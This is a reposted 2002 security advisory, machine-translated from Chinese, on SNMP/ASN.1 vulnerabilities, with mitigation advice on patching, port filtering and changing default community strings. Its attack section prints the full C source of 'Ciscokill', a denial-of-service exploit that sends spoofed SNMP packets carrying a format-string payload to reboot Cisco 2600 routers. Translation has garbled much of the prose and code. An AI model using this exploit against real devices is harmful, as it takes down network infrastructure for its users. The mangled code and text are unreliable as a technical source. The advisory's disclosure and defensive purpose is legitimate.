2. Tech
  3. SNMP protocol implements multiple vulnerabilities

SNMP protocol implements multiple vulnerabilities

xiaoxiao2021-03-06  44

SNMP protocol implements multiple vulnerabilities

Source: CNNS.NET Category: System Vulnerability Date: 2002-6-22 8:08:04

Recommended procedures:

SNMP protocol and various network equipment

description:

SNMP protocol realization mechanism has multiple vulnerabilities seriously harm Internet infrastructure

detailed:

background:

ASN NO.1 signaling is the standard of abstract data type, since 1984, it has been used to write and send complex data structures. This language has been derived from multiple communication protocols and applications from the 1980s, which is a telecommunications industry, electricity industry and nuclear power industry computer network infrastructure signaling. It is also one of the infrastructure rules of the Internet to run. A global computer security expert is investigating the security fragility of ASN N0.1 signaling. These vulnerabilities are seriously threatened by Internet infrastructure, and hackers can develop attack programs, turn off ISP backbone routers, switches, and numerous basic network devices. The final destructive consequence will cause the Internet.

Computer security experts in the industry and government are concerned about these issues. CNNS security experts have discovered that many telecom's backbone routers have fatal defects in 1999. At that time, only a simple operation, you can cause a large-scale network. To give an example, a significant vulnerability feature has appeared in China Chunghwa Telecom. In 1999, if there is a hacker, approximately 65% ​​of users will no longer go online.

Due to the security fragility of ASN NO.1 signaling, the provider of more than 100 computer network devices will pay a price. Make up the input of these defects will exceed $ 100 million.

Hundreds of network equipment providers have gained warnings early this year. Solutions have now been given.

Since multiple Internet communication protocols are based on ASN NO.1 computer network language, the vulnerability of ASN NO.1 will widely threaten the communication industry. The most significant example is to cause multiple security vulnerabilities in the SNMP protocol. The same problem also affects at least three Internet protocols, not detailed here.

Oulu University Secure Programming Group (OUSPG,

Http://www.ee.oulu.fi/research/ouspg/) Long-term focus on the research of SNMP protocol and discloses this serious safety series.

============================================================================================================================================================================================================= ========================================================================00 Multiple vulnerabilities caused by the fragility of protocols may allow illegal access to access, refusal service attacks, leading to unstable health. Simple Network Management Protocol (SNMP) protocol is widely used for monitoring and management of network devices. SNMPv1 defines multiple types of SNMP messages such as request information, configuration changes, request responses, SNMP objects, and active alarms.

1. SNMPv1 Tracking Message Processing Series Defect SNMP Agent (SNMP Agents) Send Tracking Message (SNMP TRAP Messages) to the Manager, report error messages to the manager, alert, and other status information about the host. The manager must parse and process this data. OUSPG discovers that many SNMP managers have defects during parsing and processing. Second, the SNMPv1 request information processing series defect SNMP request information is issued from the manager to the SNMP Agent agent. Request information is used to get proxy information or indicate the SNMP Agent configuration device parameters. The SNMP Agent agent must decode and process this information correctly. During decoding and subsequent data processing, both proxy and manager have a deny service error, formatted string errors, and buffering overflow attacks. Some attacks don't even need to provide the correct SNMP Community String (a key parameter for SNMP protocol settings, a bit similar to password).

These vulnerabilities can lead to denial, service interrupts, and some cases can allow attackers to obtain illegal access to devices. Attack has a different impact on different products. Solution: This site lists more than 100 companies to respond to this security issue and related information: http://www.cnns.net/patch/vendor.htm

Note that the following security measures may have a significant impact on your network daily maintenance and network settings. To ensure that the results of the following measures do not affect network operation performance.

1. Get the patch from the vendor and execute http://www.cnns.net/patch/vendor.htm provides information about the security issue.

2. Prohibiting SNMP Services CNNS It is recommended that you ban all unnecessary services, including SNMP. Unfortunately, some products have unexpected situations or denials in the case where the SNMP service is banned. If this is the case, you must perform more advanced security settings.

3, the boundary access filtering temporary measures is to prohibit poor information flow in the network boundary to enter the internal network or to the external network. For network managers, more powerful measure is to control the request for SNMP services through filtering devices such as firewalls. For example, in addition to the specified server, the request to the SNMP service is prohibited by default. The following ports are filtered to facilitate external attackers to internal network SNMP attacks: SNMP 161 / UDP # Simple Network Management Protocol (SNMP) SNMP 162 / udp # snmp System Management Messages The following services are not common, but some products may run these services:

snmp 161 / tcp # Simple Network Management Protocol (SNMP) snmp 162 / tcp # SNMP system management messagessmux 199 / tcp # SNMP Unix Multiplexersmux 199 / udp # SNMP Unix Multiplexersynoptics-relay 391 / tcp # SynOptics SNMP Relay Portsynoptics-relay 391 / udp # Synoptics SNMP RELAY Portagentx 705 / TCP # agentXSNMP-TCP-Port 1993 / TCP # Cisco SNMP TCP portsnmp # Cisco SNMP TCP port filtering the request for these services, so as not to affect normal networks run. It is worth noting that the SNMP daemon may bind all IP addresses on the device. Therefore, consider the package filtering strategy reasonably. For example, even if the SNMP package is prohibited from being sent directly to the normal network address, it is possible to attack. Because attackers can use SNMP defects to attack some special network addresses, such as network broadcast addresses broadcast addresses and all loopback addresses. (127.x.x.x) Loopback addresses are often used by routers for administrative purposes. Administrators can consider whether they are filtering these packets. But you must be cautious, because improper settings may affect network performance. Finally, access to the following RPC services can also be considered: Name Program ID Alias ​​SNMP 100122 Na.snmp SNMP-CMC SNMP-SYNOPTICS SNMP-UNISYS SNMP-UTKSNMPV2 100138 Na.snmpv2 # snm version 2.2.2snmpxdmid 100249 It is worth noting that These measures are invalid for internal attacks.

4. Filter an abnormal SNMP access in the internal network. In many network systems, only a limited network management system needs to have an SNMP request. Based on this situation, for most SNMP proxy, you can set only SNMP requests that only accept limited hosts. This reduces internal attack risks. Use these security measures must also be cautious to reduce network performance inappropriate settings.

5. Modify the default "Community String" to support the factory settings of the SNMP service, the default Community-String is "public" (read-only) and "private". CNNS strongly recommends that users modify these two default strings. Otherwise, an attacker will be able to modify the device's settings via the SNMP protocol. After modifying these two default "password", it is necessary to prevent monitoring attacks to prevent attackers to get new settings "passwords". SNMPv3 has improved this, refer to RFC2574.

6. Isolation SNMP packages from the perspective of network management, with isolation measures can reduce the risk of SNMP attacks. Includes physiological isolation, VLAN logic isolation and isolation of VPN mode. Note that VLAN isolation through the switch will increase the difficulty of attackers, but theoretically do not completely eliminate such attacks. Attack Method: Example: 1. If you get "Community String" supporting the SNMP protocol device, in the appropriate environment, the attacker will be: 1. Modify the router configuration 2, get the server's highest control 3, restart the device

Second, the attacker can also reject the service attack under the premise of "Community String". The following code will restart Cisco 2600 router: / * This Program Send a spoofed SNMPV1 Get Request That Cause System Rebooton Cisco 2600 Routers with ios Version 12.0 (10) Author: kundra@tiscali.it ... don't be lame us For testing only! .. :) * /

#include #include #include #include #include #include #include > include #include

Struct in_addr sourceip_addr; struct in_addr destip_addr; struct sockaddr_in dest;

Struct ip * ip; struct udphdr * udp; int p_number = 1, SOK, DATASize, I = 0;

Char * packet, * Source, * Target; char * packetck; char * data, c;

Char snmpkill [] = "/ x30 / x81 / xaf / x02 / x01 / x00 / x04 / x06 / x70 / x75 / x62 / x6c / x69 / x63 / x0 / x81" "/ xa1 / x02 / x02 / x09 / x28 / x02 / x01 / x00 / x02 / x01 / x00 / x30 / x81 / x94 / x30 / x81 "" / x91 / x06 / x81 / x8c / x4d / x73 / x25 / x25 / x25 / x25 / x73 / x25 / x73 "" / x25 / x73 / x25 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 "" / x25 / x73 / x25 / x73 / x25 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 "" / x25 / x73 / x25 / x25 / x25 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 "" / x25 / x25 / x25 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 "" / x25 / x73 / x25 / x73 / x25 / x25 / x25 / x25 / x73 / x25 / x73 / x25 / x73 "" / x25 / x25 / x25 / x25 / x73 / x25 / x73 / x25 / X73 / x25 / x73 / x25 / x73 "/ x25 / x73 / x25 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73" / x25 / x73 / X25 / X73 / X25 / X73 / X81 / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / X7F "/ X05"

Struct pseudoudp {u_long ipsource; u_long ipdest; char zero; char proto; u_short length;} * psudp;

IN_cksum (unsigned short * ptr, int nbytes) {register long sum; / * assumes long == 32 bits * / u_short oddbyte; register u_short answer; / * assumes u_short == 16 bits * /

/ ** Our Algorithm is Simple, USING A 32-Bit Accumulator (SUM), * WE Add Sequential 16-Bit Words to It, And at the ends from the top 16 Bits Into the Lower 16 Bits. * /

SUM = 0; while (nbytes> 1) {SUM = * PTR ; nbytes - = 2;

/ * mop up an odd byte, if neseary * / if (nbytes == 1) {oddbyte = 0; / * make sudu Half is zero * / * (u_char *) & oddbyte) = * (u_char *) PTR ; / * One byte online * / sum = oddbyte;}

/ ** Add Back Carry Outs from top 16 bits to low 16 bits. * /

SUM = (SUM >> 16) (SUM & 0xFFFF); / * add high-16 to low-16 * / sum = (sum >> 16); / * add carry * / answer = ~ sum; / * Ones-complement, the truncate to 16 bits * / return (answer);

Void usage (void) {Printf ("Kundera Ciscokill V1.0 / N"); Printf ("USAGE: Ciscokill [-n Number of Packets] [-S Source IP_ADDR] -t ip_target / n");}

INT main (int Argc, char ** argv) {

IF (argc <2) {usage (); exit (1);

While ((C = Getopt (Argc, Argv, "S: T: N:")))! = EOF) {switch (c) {Case 's': source = OPTARG; Break; Case 'N': p_number = atoi (OPTARG); Break; Case 'T': target = OPTARG;}}

IF ((SOK = Socket, Sock_RAW, IPPROTO_RAW) <0) {printf ("can't create socket./n" .;Exit (EXIT_FAILURE);}

Destip_addr.s_addr = inet_addr (target); sourceip_addr.s_addr = inet_addr (source);

DataSize = SizeOf (snmpkill);

Packet = (char *) Malloc (20 8 Datasize);

IP = (struct ip *) packet;

MEMSET (Packet, 0, SizeOf (Packet)); IP-> ip_dst.s_addr = destip_addr.s_addr; ip-> ip_src.s_addr = sourceip_addr.s_addr; ip-> ip_v = 4; IP-> ip_hl = 5; IP- > ip_ttl = 245; ip-> ip_id = htons (666); IP-> ip_p = 17; ip-> ip_len = HTONS (20 8 DATASize); IP-> ip_sum = in_cksum ((u_short *) packet, 20 ); Udp = (struct udphdr *) (packet 20); udp-> source = htons (666); udp-> dest = htons (161); udp-> len = htons (8 dataize); udp-> check = 0; packetck = (char *) malloc (8 datasize sizeof (struct pseudoudp)); bzero (packetck, 8 datasize sizeof (struct pseudoudp)); psudp = (struct pseudoudp *) (packetck); psudp -> ipdest = destip_addr.s_addr; psudp-> ipsource = sourceip_addr.s_addr; psudp-> zero = 0; psudp-> proto = 17; psudp-> length = htons (8 datasize); memcpy (packetck sizeof (struct PseudOUDP), UDP, 8 Datasize; Memcpy (Struct PseudouDP) 8, SNMPKILL, DATASize;

UDP-> Check = in_cksum ((u_short *) Packetck, 8 DataSize SizeOf (Struct PseudouDP);

Data = (Packet 20 8); Memcpy (Data, SNMPKILL, DATASIZE); DEST.SIN_FAMILY = AF_INET; DEST.SIN_ADDR.S_ADDR = destip_addr.s_addr;

While (I

i ;

} Printf ("% d packets Sent./n" ,i);

} Security Suggestions: In the case of allowing SNMP protocol additional information: http://www.kb.cert.org/vuls/id/854306Http://www.kb.cert.org/vuls/id/107186ca- 2002-03 http://online.wsj.com/article_email/0, sb1023731908761703280,00.html

转载请注明原文地址:https://www.9cbs.com/read-57953.html

9cbs

New Post(0)